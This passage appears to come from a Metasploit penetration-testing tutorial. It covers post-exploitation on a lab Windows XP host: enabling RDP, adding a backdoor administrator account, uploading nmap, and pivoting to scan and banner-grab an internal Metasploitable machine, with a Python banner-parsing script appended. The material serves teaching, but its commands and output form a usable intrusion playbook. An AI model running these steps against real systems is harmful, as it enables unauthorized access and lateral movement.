Post Exploitation

At this point, we should have a Meterpreter console running in the background within msfconsole, so we can begin to scan the target’s subnet for other live systems. To do this, we’ll upload nmap to the target and run it from the Windows machine.

First, download nmap from insecure.org in an executable format and save it locally; this is the binary we'll upload to the target. Next, we'll use the getgui Meterpreter script to enable Microsoft's Remote Desktop Protocol (RDP), the built-in graphical remote administration protocol that lets you interact with the Windows desktop as if you were sitting in front of the remote machine, and to forward the target's RDP port (3389) back through the Meterpreter session to port 8080 on our attacking machine. We'll then add a new administrative user to the system so that we have credentials to log in with.

We enter rdesktop localhost:8080 from Back|Track's command line, so we can log into the system with the newly created user account. We then use Meterpreter to upload nmap to the target. Our goal is to install nmap on the compromised Windows target and use the system as a staging ground for further attacks. Alternatively, you could use scanner/portscan/syn and scanner/portscan/tcp to port scan directly through Metasploit, routing the traffic through the Meterpreter session. The choice is a matter of personal preference and needs. Keep in mind that adding a local administrator (here, msf with the trivially guessable password metasploit) is a visible, persistent change to a client's system: note it for your cleanup list and remove it when the engagement ends.

meterpreter > run getgui -e -f 8080
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 8080
[*] Local TCP relay created: 0.0.0.0:8080 <-> 127.0.0.1:3389
meterpreter > shell
Process 2480 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user msf metasploit /add
net user msf metasploit /ADD
The command completed successfully.
C:\WINDOWS\system32>net localgroup administrators msf /add
net localgroup administrators msf /add
The command completed successfully.
C:\WINDOWS\system32>
C:\WINDOWS\system32>^Z
Background channel 6? [y/N]  y
meterpreter > upload nmap.exe
[*] uploading  : nmap.exe -> nmap.exe
[*] uploaded   : nmap.exe -> nmap.exe
meterpreter >

We now have our launching pad for additional attacks. With nmap installed on the target, we are essentially sitting on the internal network. We can now attempt to enumerate internally connected systems and further penetrate the network.

Because nmap now runs on the compromised Windows XP host, it sits on the internal network and can reach hosts that our attacking machine cannot. (The auto_add_route plugin we loaded earlier with load auto_add_route does the equivalent for Metasploit's own modules, routing their traffic through the Meterpreter session, so we can scan and exploit inside hosts from msfconsole as well.) We're effectively connected to the internal network, so we should be able to reach our Metasploitable system. Let's begin with a basic port scan: -sT performs a full TCP connect scan, -A enables version and OS detection along with default scripts, and -P0 (the older spelling of -Pn) skips host discovery so the host is scanned even if it doesn't answer pings.

nmap.exe -sT -A -P0 172.16.32.162

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
|_ftp-bounce: no banner
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_html-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_html-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
MAC Address: 00:0C:29:39:12:B2 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Name: WORKGROUP\Unknown
|_  System time: 2010-05-21 22:28:01 UTC-4

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.19 seconds

Here we see a series of open ports. Based on nmap's OS detection and the Service Info line, the scanned system is a UNIX/Linux variant of some sort. Several of these services should jump out at you: FTP, Telnet, SSH, SMTP, HTTP (both Apache and Tomcat), Samba, MySQL, and PostgreSQL.

Because a few ports look interesting, we’ll start banner-grabbing each one to try to find a way into the system.

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 172.16.32.162
RHOSTS => 172.16.32.162
msf auxiliary(ftp_version) > run

[*] 172.16.32.162:21 FTP Banner: '220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.16.32.162]\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) >

We now know that ProFTPD 1.3.1 is running on port 21. Next we use SSH to learn more about the target, adding the -v flag for verbose output. Read the listing carefully: the first line that ssh -v prints is the version of our own OpenSSH client on the attacking machine (OpenSSH_5.1p1 Debian-3ubuntu1 here), not the server's. The server's version is reported further down in the verbose output, on the line that gives the remote software version, and nmap has already identified it above as OpenSSH 4.7p1 Debian 8ubuntu1, an older Ubuntu build of OpenSSH:

msf > ssh 172.16.32.162 -v
[*] exec: ssh 172.16.32.162 -v

OpenSSH_5.1p1 Debian-3ubuntu1, OpenSSL 0.9.8g 19 Oct 2007

Now we use the telnet_version scanner, which reports the login banner, to determine the version of Ubuntu running on this system:

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set RHOSTS 172.16.32.162
RHOSTS => 172.16.32.162
msf auxiliary(telnet_version) > run

[*] 172.16.32.162:23 TELNET Ubuntu 8.04\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >

Great! We know that the system is running Ubuntu 8.04 and that two unencrypted protocols (telnet and FTP) are in use; any credentials sent over them cross the network in the clear, which might come into play later.

Now let’s look at SMTP to see what version our target is running. Remember that we are trying to identify the running versions of the services operating on the various remote systems.

msf > use auxiliary/scanner/smtp/smtp_version
msf auxiliary(smtp_version) > set RHOSTS 172.16.32.162
RHOSTS => 172.16.32.162
msf auxiliary(smtp_version) > run

[*] 172.16.32.162:25 SMTP 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)\x0d\x0a
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smtp_version) >

As you can see, the Postfix mail server is running on the Metasploitable system, although unlike the FTP banner, this one does not reveal a version number.

This process is continued through all the different ports that have been discovered as listening on our target. The various auxiliary modules (the *_version scanners in particular) are very useful for this work. When you're finished, you should have a list of the versions of software running on the system, information that you will use when targeting attacks.
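The banner-grabbing loop described above, and the version inventory it should produce, as an added example in Python; this is not code from the original text or from the Metasploit project. The grab_banner function assumes direct TCP reach to the target (for instance, when run from the compromised pivot host), while the parser is exercised offline on SAMPLE_BANNERS, which are constructed from the banners shown in the listings above rather than captured here. Note that reading the SSH banner straight off the socket returns the server's identification string, so it avoids the ssh -v mix-up described earlier.

```python
import re
import socket

# Probes for services that stay silent until the client speaks (HTTP here);
# FTP, SSH, telnet and SMTP all announce themselves on connect.
PROBES = {80: b"HEAD / HTTP/1.0\r\n\r\n", 8180: b"HEAD / HTTP/1.0\r\n\r\n"}

# Telnet option negotiation: IAC (0xff) + WILL/WONT/DO/DONT + option byte.
# telnetd sends these before the login banner, so strip them before matching.
TELNET_IAC = re.compile(r"\xff[\xfb-\xfe].")

# Regexes for the banner formats seen during enumeration. Named groups become
# inventory fields; a banner that matches nothing is still kept verbatim.
BANNER_PATTERNS = [
    ("ssh", re.compile(r"^SSH-(?P<proto>[\d.]+)-(?P<product>[^_\s]+)_(?P<version>\S+)(?: (?P<os>[^\r\n]+))?")),
    ("ftp", re.compile(r"^220[ -](?P<product>ProFTPD) (?P<version>\S+) Server(?: \((?P<os>[^)]*)\))?")),
    ("smtp", re.compile(r"^220 (?P<hostname>\S+) ESMTP (?P<product>\S+)(?: \((?P<os>[^)]*)\))?")),
    ("telnet", re.compile(r"^\s*(?P<os>Ubuntu [\d.]+)\s*\n(?P<hostname>\S+) login:")),
    ("http", re.compile(r"^HTTP/[\d.]+ \d{3}.*?\r\nServer: (?P<product>[^/\r\n]+)(?:/(?P<version>\S+))?(?: \((?P<os>[^)]*)\))?", re.S)),
]


def grab_banner(host, port, timeout=5.0):
    """Connect to host:port, send a probe if the service needs one, return the first reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if port in PROBES:
            s.sendall(PROBES[port])
        try:
            data = s.recv(2048)
        except socket.timeout:
            data = b""
    # latin-1 keeps telnet's 0xff bytes intact for TELNET_IAC to strip later.
    return data.decode("latin-1")


def identify(port, raw):
    """Map one raw banner to an inventory record; unknown banners keep their first line."""
    banner = TELNET_IAC.sub("", raw)
    lines = banner.strip().splitlines()
    record = {"port": port, "service": None, "product": None, "version": None,
              "os": None, "hostname": None, "banner": lines[0] if lines else ""}
    for service, pattern in BANNER_PATTERNS:
        m = pattern.match(banner)
        if m:
            record["service"] = service
            record.update({k: v for k, v in m.groupdict().items() if v is not None})
            break
    return record


def build_inventory(banners):
    """banners: {port: raw banner text}. Returns one record per port, sorted by port."""
    return [identify(port, banners[port]) for port in sorted(banners)]


def enumerate_host(host, ports, timeout=5.0):
    """Live version: grab each port in turn; a refused or timed-out port is recorded, not fatal."""
    banners = {}
    for port in ports:
        try:
            banners[port] = grab_banner(host, port, timeout)
        except OSError as exc:
            banners[port] = f"<error: {exc}>"
    return build_inventory(banners)


# Constructed sample input, assembled from the banners in the listings above
# (the telnet negotiation bytes and the HTTP response are assumed, not captured).
SAMPLE_BANNERS = {
    21: "220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.16.32.162]\r\n",
    22: "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\r\n",
    23: "\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'Ubuntu 8.04\nmetasploitable login: ",
    25: "220 metasploitable.localdomain ESMTP Postfix (Ubuntu)\r\n",
    80: "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch\r\n"
        "Content-Type: text/html\r\n\r\n",
}

if __name__ == "__main__":
    # Offline demonstration; swap in enumerate_host("172.16.32.162", SAMPLE_BANNERS) on the pivot.
    for rec in build_inventory(SAMPLE_BANNERS):
        print(f"{rec['port']:>5}/tcp {rec['service'] or '?':7} "
              f"{rec['product'] or '-'} {rec['version'] or '-'} {rec['os'] or ''}")
```

Each record carries the raw first line as well as the parsed fields, so a banner the patterns don't recognise (a custom or error response) still ends up in the inventory for manual review rather than being silently dropped; add a pattern to BANNER_PATTERNS when a new service format turns up.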